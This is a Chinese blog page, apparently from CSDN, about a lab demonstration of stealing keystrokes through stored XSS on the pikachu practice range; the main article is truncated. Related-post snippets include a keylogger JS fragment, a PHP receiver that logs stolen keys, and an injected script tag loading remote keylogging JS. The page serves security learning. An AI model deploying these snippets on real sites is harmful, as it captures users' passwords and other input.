xss获取键盘记录实验演示

最新推荐文章于 2025-06-02 15:27:06 发布
原创 最新推荐文章于 2025-06-02 15:27:06 发布 · 1.5k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文通过一个实际的XSS实验演示了如何利用存储型XSS获取键盘记录,探讨了同源策略的重要性。在实验中,攻击者在目标网站嵌入恶意JS,虽然同源策略阻止了直接的数据传输,但在攻击者可控的环境下,仍能绕过限制捕获用户输入。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在实验之前,我们首先来了解一下什么事跨域
在这里插入图片描述
跨域-同源策略
在这里插入图片描述
为什么要有同源策略
没有的话只需要一个url就可以盗取你的信息了,不需要xss漏洞
在这里插入图片描述
我们来到pikachu,进入xss的存储型
我们首先来看一下后台,在pikachu xss的后台有键盘记录这么一个目录
在这里插入图片描述
我们需要去嵌入一个能够调用我们的远程js的方法
在这里插入图片描述
把这段代码放进去,点提交后,这个js就被嵌入到这个页面中了
在这里插入图片描述
在这里插入图片描述
我们打开控制台,在页面上随便输入一个键盘,他会显

最低0.47元/天 解锁文章

200万优质内容无限畅学
XSS获取键盘记录练习
weixin_44720762的博客
05-03 1208
在开始本篇博客之前,我想先声明,本人初涉安全领域知识,此博客用于记录日常渗透练习心得,并不提倡用着专业指导知识,请选择性阅读。 因为相关知识的练习性,先对部分名词含义进行说明。 跨域: URL(统一资源定位符)中有 协议,子域名,主域名,端口,资源地址。在任意两个URL中这几个部分中任意部分纯在不同就是跨域操作。我们把任意两个域间进行的资源访问操作称为跨域操作。 同源策略:同源策略(Same or...
DOM型XSS;cookie获取XSS后台使用;XSS钓鱼演示XSS获取键盘记录实验演示
qq_44696653的博客
04-21 2384
DOM型XSS DOM简介(摘录) 通过JavaScript,可以重构整个HTML文档,可以添加、移除、改变或重排页面上的项目。 要改变页面的某个东西,JavaScript就需要获得对HTML文档中所有元素进行添加、移动、改变或移除的方法和属性,都是通过文档对象模型来获得的(DOM)。 所以就可以将DOM理解为访问HTML的标准编程接口。 DOM型XSS漏洞演示 ...
XSS跨站脚本攻击之——XSS获取键盘记录
温柔小薛的博客
04-05 568
XSS获取键盘记录 条件比较苛刻 除非对方网站管理员配置了跨域访问否则无法实现 理论 什么是跨域 http:// www. oldboyedu.com :80 / news/index.php 协议 :// 子域名 . 主域名 : 端口 / 资源地址 当协议、主机(主域名,子域名)、端口中的任意一个不相同时,称为不同域。我们把不同的域之间请...
pikachu靶场通关笔记10 XSS关卡06-XSS之盲打
最新发布
mooyuan的网络安全博客
06-02 1160
本系列为通过《pikachu靶场通关笔记》的XSS关卡(共10关)渗透集合,通过对XSS关卡源码的代码审计找到真实原因,讲解XSS的原理并进行渗透实践,本文为XSS第06关-XSS盲打的渗透部分,并且结合源码分析,对比通用的XSS攻击讲解攻击成因。
pikachuxss获取键盘记录
2301_80661529的博客
02-28 1096
此处xss漏洞主要利用src属性的跨站访问,使得被攻击者可以通过src属性自动跳转到攻击者的xss平台,祝各位学习顺利!
3-8案例演示-xss获取键盘记录实验演示
山兔的博客
04-26 1149
实验前,先了解一下什么是跨域 因为在这个实验里面,我们会去远程的调用js文件,远程调用js会涉及到跨域请求的问题 http:// www . xyz.com : 8080 / script/test.js 协议 子域名 主域名 端口 资源地址 当协议、主机(主域名、子域名)、端口中的任意一个不相同时,称为不同域 我们把不同的域之间请求数据的操作,成为跨域操作 跨域-同源策略 而为了安全考虑,所有的浏览器都约定了“同源策略”,(同源策略是在浏览器端去执行的)同源策略规定,两个不同
利用XSS漏洞获取键盘记录
weixin_73049307的博客
09-05 703
(win11本机中开启phpstudy,让虚拟机win7进行访问,win7是受害者)若是想结束“键盘记录”就得删了存储记录或者初始化pikachu靶场。(当然,键盘记录也只是局限于xss存储型页面)
XSS跨站脚本攻击:获取键盘记录
jklbnm12的博客
01-20 1412
将进行下图3个实验,更好的来理解xss的危害和原理 先去修改下Pikachu靶机中的,cookie.php修改成自己的ip 实验1:xss如何获取cookie? 只需要将  Pikachu靶机中的pkxss文件复制到攻击机中的站点(www)下即可。 登入下      默认没任何数据 1.1 GET型XSS利用:cookie获取 先将字符长度的限制给修改掉 pkxss后台: http://192.168.43.117/pkxss/pkxss_login.php 现在是没
SQL Inject注入漏洞防范/sqlmap工具使用入门及案例介绍/XSS基本概念和原理介绍/反射型XSS、存储型XSS漏洞实验演示和讲解/nmap下载安装
qq_44696653的博客
04-15 754
SQL Inject注入漏洞的防范(以摘录为主) SQL Inject注入漏洞的防范可分为两部分:代码层面和网络层面。 代码层面:1.对输入进行严格的转义和过滤。2.使用预处理和参数化 网络层面:1.通过WAF设备启用防SQL Inject注入策略(或类似防护系统) 2.云端防护(360网站卫士,阿里云盾等) PHP防范转义+过滤:以php为例,可以写一个函数对前端输入进来的数据进行转义,将里面的...
XSS (跨站脚本攻击) 分析与实战
a10534126的博客
02-23 1814
文章目录 一、漏洞原理 1、XSS简介: 2、XSS原理解析: 3、XSS的分类: 3.1、反射型XSS 3.2、存储型XSS 3.3、DOM型XSS 二、靶场实战 XSS实现盗取管理员Cookie并登录: 一、漏洞原理 1、XSS简介: XSS全称:Cross Site Scripting,即跨站脚本攻击,为了不和“层叠样式表”(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是最常见的 Web 应用程序安
pikachu漏洞靶机之xss获取键盘记录
weixin_43803070的博客
06-01 1521
实验前,先了解一下什么是跨域 http:// www . xyz.com : 8080 / script/test.js 协议 子域名 主域名 端口 资源地址 当协议、主机(主域名,子域名)、端口中的任意一个不相同时,称为不同域 我们把不同的域之间请求数据的操作,成为跨域操作。 跨域-同源策略 而为了安全考虑,所有的浏览器都约定...
xss-键盘记录
weixin_46164380的博客
03-08 264
开启liunx的apache服务。 /etc/init.d/apache2 start 在/var/www/html下面创建三个文件 keylogger.js document.onkeypress = function(evt) { evt = evt || window.event key = String.fromCharCode(evt.charCode) if...
XSS漏洞利用---键盘记录
Ethan024的博客
03-13 563
XSS漏洞利用(本文仅供技术学习与分享) 存储型XSS漏洞之钓鱼 实验准备: 皮卡丘靶场; 存在存储型xss漏洞的网页; pkxss键盘记录后台; 实验步骤: 4. 嵌入恶意的js标签 — src=“http://localhost/pikaqiu.cn/pkxss/rkeypress/rk.js” 5. 在输入框中输入字符串:111111并查看后台,发现已经记录。 Tips: 如果无法记录数据,需关闭浏览器的同源策略Access-Contrl-Allow-Origin. ...
利用XSS实现受害者的键盘记录
weixin_51356351的博客
11-17 308
实验环境: PHPstudy DVWA靶场 实验步骤: 1、在www目录下创建一个名为keylog.php的文件,代码如下: <?php $file = fopen("key.txt","a"); if(isset($_REQUEST['key'])) { $key = $_REQUEST['key']; fputs($file,$key); } ?> 2、进入DVWA靶机,级别调成low,选择(XSS)stored 3、F12打开查看器,将输入限制值改的大一点 4、将 <scri
XSS键盘记录和cookie获取
Williamanddog的博客
01-26 2741
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混 淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意JavaScript代码,当用户浏览该页 面时,嵌入Web里面的JS代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的 攻击。 在一个Web页面上,有一种很常见的功能是将用户输入的内容输出到页面上。但是如果这里输入的内容 。
反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录
weixin_43858799的博客
04-22 3210
XSS: 反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录 一、跨站脚本漏洞(XSSXSS漏洞一直被评估为web漏洞中危害较大的漏洞 XSS是一种发生在web前端的漏洞,主要危害前端用户 XSS可以通过进行钓鱼攻击,前端js挖矿,用户cookie获取,甚至结合浏览器自身漏洞对主机进行远程控制等 攻击流程图: 危害:存储型>反射型>D...
风炫安全WEB安全学习第二十五节课 利用XSS键盘记录
风炫的博客
01-05 190
风炫安全WEB安全学习第二十五节课 利用XSS键盘记录 XSS键盘记录 同源策略是浏览器的一个安全功能,不同源的客户端脚本在没有明确授权的情况下,不能读写对方资源。所以xyz.com下的js脚本采用ajax读取abc.com里面的文件数据是会被拒绝的。 同源策略限制了从同一个源加载的文档或脚本如何与来自另一个源的资源进行交互。这是一个用于隔离潜在恶意文件的重要安全机制。 注意,资源文件不受影响: <script src="..."> <img src="..."> <
漏洞复现篇——利用XSS漏洞实现键盘记录
爱国小白帽
02-21 1855
实验环境: PHPstudy 火狐浏览器、IE DVWA靶场 实验准备: 在www目录下创建一个名为keylog.php的文件,代码如下: <?php $file = fopen("key.txt","a"); if(isset($_REQUEST['key'])) { $key = $_REQUEST['key']; fputs($file,$key); } ?> 模拟实验...
Pikachu-XSS漏洞之cookie值获取、钓鱼结果和键盘记录实战记录
m0_74608722的博客
08-17 2571
我们可以向用户发送一个链接请求,用户点击后会给我们提前搭建好的后台发出一个请求,后台收到请求后会返回一个身份信息验证的Basic头部,如果用户安全意识不够,输入了敏感信息:用户名和密码,然后这些就会被发送到pkxss后台。首先我们登录进去,我们发现界面和get型的是完全一样的,我们随便输入点东西:发现并没有在url里面显示,那怎么回事那,其实这个就是post型的,请求是通过post的方式发送的。**好了,所有的Pikachu模块我们都已经练习完了,但是还遗留下一些实战训练,我们今天就来一口气完成!
xss攻击键盘记录语句
01-08
利用跨站脚本(XSS)实施键盘记录是一种严重的安全威胁,通过这种手段可以捕获用户的按键输入从而窃取敏感信息。下面是一个简单的HTML与JavaScript组合的例子来展示如何理论上实现这一功能;请注意这仅作为教育目的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值